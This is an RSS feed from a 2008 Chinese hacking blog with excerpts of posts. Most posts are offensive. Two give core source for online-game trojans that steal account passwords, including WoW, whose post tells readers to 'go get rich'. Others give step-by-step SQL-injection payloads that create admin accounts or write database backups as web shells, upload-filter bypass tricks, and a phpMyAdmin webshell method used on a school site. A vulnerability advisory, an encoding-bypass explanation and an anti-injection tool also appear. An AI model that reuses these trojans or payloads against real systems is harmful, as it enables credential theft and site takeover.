<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:wfw="http://wellformedweb.org/CommentAPI/">
  <channel>
    <title><![CDATA[大胆's blog]]></title> 
    <link>http://www.xkww.com/</link> 
    <description><![CDATA[大胆's blog,  www.xkww.com www.dadan.net.cn]]></description> 
    <language>zh</language> 
    <copyright><![CDATA[Copyright 2008, 大胆's blog]]></copyright> 
    <webMaster><![CDATA[hackdirl@gmail.com (大胆)]]></webMaster> 
    <generator>LBS v2.0.313</generator> 
    <pubDate>Tue, 07 Oct 2008 08:02:50 +0800</pubDate> 
    <ttl>60</ttl>
  
    <item>
      <title><![CDATA[美服，欧服WOW木马核心源代码，游戏版本v2.4.3.8606]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=219]]></link> 
      <category><![CDATA[工具资源]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 18 Sep 2008 10:33:35 +0800</pubDate> 
      <description><![CDATA[文章作者：asm （MSN：asm32@live.cn）<br />信息来源：邪恶八进制<br /><br />对应游戏版本v2.4.3.8606。这个只是核心代码，而非完整代码，通过调式完全可以写出美服跟欧服的WOW马来，大家发财去吧<br /><br />;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;;<br />;                 Programmed by asm, MSN:asm32@live.cn                          ;<br />;                  WOWGameMaker For WOW_MF_OF                                   ;<br />;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;&gt;]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=219]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[天龙八部木马核心代码，版本0.50.0385]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=218]]></link> 
      <category><![CDATA[工具资源]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Thu, 18 Sep 2008 10:33:12 +0800</pubDate> 
      <description><![CDATA[信息来源：邪恶八进制信息安全团队（www.eviloctal.com）<br />文章作者：认真的雪<br /><br />我也来凑凑热闹.....<br />发一个网游木马核心代码...无聊的时候写的..<br />截取了用户名，密码，等级，仓库密码<br /><br />#include &lt;windows.h&gt;<br />BYTE userCode[7]={0x8B,0x45,0x0C,0x50,0x8D,0x4B,0x5C};<br />BYTE userJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};<br /><br />BYTE gradeCode[6]={0x89,0x9F,0xFC,0x00,0x00,0x00};<br />BYTE gradeJmpCode[6]={0xe9,0x00,0x00,0x00,0x00,0x90};<br /><br />BYTE storeCode[9]={0x8B,0x4E,0x04,0x33,0xC5,0x57,0x8B,0x7D,0x08};<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=218]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[上传漏洞利用方法]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=217]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 12 Sep 2008 11:24:32 +0800</pubDate> 
      <description><![CDATA[1.直接上传asp.asa.jsp.cer.php.aspx.htr.cdx....之类的马，拿到shell。<br /><br />2.就是在上传时在后缀后面加空格或者加几点，也许也会有惊奇的发现。例：*.asp ,*.asp..。<br /><br />3.利用双重扩展名上传例如：*.jpg.asa格式(也可以配上第二点一起利用)。<br /><br />4.gif文件头欺骗，gif89a文件头检测是指程序为了他人将asp等文件后缀改为gif后上传,读取gif文件头,检测是否有gif87a或gif89a标记,是就允许上传,不是就说明不是gif文件。 而欺骗刚好是利用检测这两个标记,只要在木马代码前加gif87a就能骗过去。]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=217]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[MSSQL 2005 Backup log shell]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=216]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 12 Sep 2008 11:08:35 +0800</pubDate> 
      <description><![CDATA[第一步<br /><a href="http://www.sb.com/test.asp&amp;#39;;alter/**/database/**/&#91;netwebhome&#93;/**/set/**/recovery/**/full&#91;/url&#93;--" title="http://www.sb.com/test.asp&amp;#39;;alter/**/database/**/&#91;netwebhome&#93;/**/set/**/recovery/**/full&#91;/url&#93;--" target="_blank">http://www.sb.com/test.asp&amp;#39;;alter/**/database/**/&#91;netwebhome&#93;/**/set/**/recovery/**/full&#91;/url&#93;--</a><br /><br />第二步：<br /><a href="http://www.sb.com/test.asp&amp;#39;;declare/**/@d/**/nvarchar" title="http://www.sb.com/test.asp&amp;#39;;declare/**/@d/**/nvarchar" target="_blank">http://www.sb.com/test.asp&amp;#39;;declare/**/@d/**/nvarchar</a>(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--<br /><br />第三步<br /><a href="http://www.sb.com/test.asp&amp;#39;;drop/**/table/**/&#91;itpro&#93;--" title="http://www.sb.com/test.asp&amp;#39;;drop/**/table/**/&#91;itpro&#93;--" target="_blank">http://www.sb.com/test.asp&amp;#39;;drop/**/table/**/&#91;itpro&#93;--</a><br /><br />第四步<br /><a href="http://www.sb.com/test.asp&amp;#39;;crea" title="http://www.sb.com/test.asp&amp;#39;;crea" target="_blank">http://www.sb.com/test.asp&amp;#39;;crea</a>]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=216]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[oblog4.6添加后台管理员漏洞(仅适用于sql版)]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=215]]></link> 
      <category><![CDATA[漏洞公布]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 12 Sep 2008 11:07:22 +0800</pubDate> 
      <description><![CDATA[1、注册一个用户，用户名script，密码123456<br />2、发布一篇日志，日志标题：测试一下<br />3、个人前台首页找到日志&quot;测试一下&quot;，点&quot;推荐&quot;<br />4、个人后台管理，选择&quot;常用&quot;选项中的&quot;推荐日志&quot;，然后点&quot;测试一下&quot;日志后面的修改，把摘要内容修改成：s&#39;/**/WHERE/** /logid=1;insert/**/into/**/oblog_admin/**/(username,password,roleid)values(&#39;script&#39;,&#39;49ba59abbe56e057&#39;,0);--<br />5、最后点&quot;确认提交&quot;按钮，如果提示修改成功，注入完成！<br />6、登录后台，地址/admin/admin_login.asp，输入上面的用户名和密码，登录后台成功！]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=215]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[利用phpMyAdmin拿webshell]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=214]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 12 Sep 2008 11:04:28 +0800</pubDate> 
      <description><![CDATA[某个学校网站的shell被管理员del了，只好重新弄。<br />这次是利用phpMyAdmin（哈哈，帐号密码我记下了！）<br /><br />首先：<br />create database joyuan; /* 建立数据库joyuan */<br />use joyuan; /* 连接joyuan数据库 */<br />create table shell(code text); /* 建立表shell字段code文本型数据text */<br /><br />然后：<br />insert into shell(code) /* 插入数据到shell表中的code字段 */<br />values (&#39;shell代码&#39;); /* 值为shell代码 我用PHP一句话，看后面*/<br />select * into outfile &#39;/home/www/htdocs/server.php&#39; from shell;<br />/* 将shell表中的内容输出保存为文件(输出到web目录下，要不就无法]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=214]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[PhpBazar adid SQL注入漏洞]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=211]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 29 Aug 2008 14:13:45 +0800</pubDate> 
      <description><![CDATA[phpBazar ’adid’ SQL注入漏洞  <br />影响版本:  <br /><br />    SmartISoft phpBazar 2.0.2  <br /><br />描述:  <br />BUGTRAQ ID: 30773  <br />CNCAN ID：CNCAN-2008082206  <br /><br />phpBazar是一款基于PHP的WEB应用程序。  <br />phpBazar不正确过滤用户提交的输入，远程攻击者可以利用漏洞进行SQL注入攻击，获得敏感信息或操作数据库。  <br />问题是脚本对用户提交的’adid’参数缺少过滤，提交恶意SQL查询作为参数数据，可更改原来的SQL逻辑，获得敏感信息或操作数据库。  <br />&lt;* 参考  <br /><br />    <a href="http://www.securityfocus.com/bid/30773" title="http://www.securityfocus.com/bid/30773" target="_blank">http://www.securityfocus.com/bid/30773</a>  <br /><br />*&gt;  <br />SEBUG安全建议:  <br /><br />目前没有解决方案提供：  <br /><a href="http://www.smartisoft.com/" title="http://www.smartisoft.com/" target="_blank">http://www.smartisoft.com/</a>  <br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=211]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[dedecms注射漏洞]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=210]]></link> 
      <category><![CDATA[漏洞公布]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 29 Aug 2008 14:13:10 +0800</pubDate> 
      <description><![CDATA[漏洞说明：DedeCms由2004年到现在，已经经历了五个版本，从 DedeCms V2 开始，DedeCms开发了自己的模板引擎，使用XML名字空间风格的模板，对美工制作的直观性提供了极大的便利，从V2.1开始，DedeCms人气急却上升，成为国内最流行的CMS软件，在DedeCms V3版本中，开始引入了模型的概念，从而摆脱里传统网站内容管理对模块太分散，管理不集中的缺点，但随着时间的发展，发现纯粹用模型化并不能满足用户的需求，从而DedeCms 2007（DedeCms V5）应声而出.80sec在其产品中发现了多个严重的SQL注射漏洞，可能被恶意用户查询数据库的敏感信息，如管理员密码，加密key等等，从而控制整个网站。<br /><br />漏洞厂商：<a href="http://www.dedecms.com" title="http://www.dedecms.com" target="_blank">http://www.dedecms.com</a><br /><br />漏洞来源：<a href="http://www.80sec.com/release/dedecms-sql-injection.txt" title="http://www.80sec.com/release/dedecms-sql-injection.txt" target="_blank">http://www.80sec.com/release/dedecms-sql-injection.txt</a><br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=210]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[PHP字符编码绕过漏洞总结]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=209]]></link> 
      <category><![CDATA[攻击技术]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Fri, 29 Aug 2008 14:10:56 +0800</pubDate> 
      <description><![CDATA[S:之前转过来的文章删除了，很多人问为什么，其实没有为什么，也懒得一一解答了，再转过来，存档之。<br /><br />其实这东西国内少数黑客早已知道，只不过没有共享公布而已。有些人是不愿共享，宁愿烂在地里，另外的一些则是用来牟利。<br />该漏洞最早2006年被国外用来讨论数据库字符集设为GBK时，0xbf27本身不是一个有效的GBK字符，但经过 addslashes() 转换后<br /><br />变为0xbf5c27，前面的0xbf5c是个有效的GBK字符，所以0xbf5c27会被当作一个字符0xbf5c和一个单引号来处理，结果漏洞就触<br /><br />发了。<br /><br />mysql_real_escape_string() 也存在相同的问题，只不过相比 addslashes() 它考虑到了用什么字符集来处理，因此可以用相<br /><br />应的字符集来处理字符。在MySQL 中有两种改变默认字符集的方法。<br /><br />方法一：<br /><br />改变mysql配置文件my.cnf<br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=209]]></wfw:commentRss>
    </item>
      
    <item>
      <title><![CDATA[sql通用防注入3.2 beta版以及安装建议]]></title> 
      <link><![CDATA[http://www.xkww.com/article.asp?id=208]]></link> 
      <category><![CDATA[工具资源]]></category> 
      <author><![CDATA[Admin <null@null.com>]]></author> 
      <pubDate>Mon, 04 Aug 2008 14:08:56 +0800</pubDate> 
      <description><![CDATA[在这里先谢谢某人，再谢谢所有支持和关心本站以及我个人的朋友们，是你们给了我继续把这个站点更新下去的动力和勇气，谢谢。<br /><br />上次发布的版本是：2006年10月12日<br /><br />原本不打算再更新了，不过最近又有朋友问起了，在测试中确实又发现了一些问题，亲自帮助一个朋友安装调试也发现了一些问题，索性花了点时间修补了下Bug。功能上没有改变，仅仅修补安装时候可能出现的一个bug： <br />引用 <br />Option Explicit选项打开系统无法正常使用的bug，并且优化了变量定义，防止与用户系统变量重复。<br />提供一些安装的建议：<br />1.就是调用主文件的时候，最好采用绝对路径调用，防止因路径问题引起一些不必要的麻烦。<br />如：<br />&lt;!--#include virtual=&quot;/Neeao.com/Neeao_SqlIn.Asp&quot;--&gt;<br />2.安装的时候，最好能在文件头部调用，有时候可能有些程序在调用数据库连接文件的时候，并不是在头部，如： <br />]]></description>
      <wfw:commentRss><![CDATA[http://www.xkww.com/feed.asp?q=comment&id=208]]></wfw:commentRss>
    </item>
      
  </channel>
</rss>
